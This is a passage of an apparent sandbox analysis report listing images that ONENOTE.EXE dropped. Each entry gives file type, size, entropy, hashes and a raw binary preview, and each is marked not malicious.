                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3361
                                                                                                        Entropy (8bit):7.619405839796034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                        MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                        SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                        SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                        SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2695
                                                                                                        Entropy (8bit):7.434963358385164
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                        MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                        SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                        SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                        SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
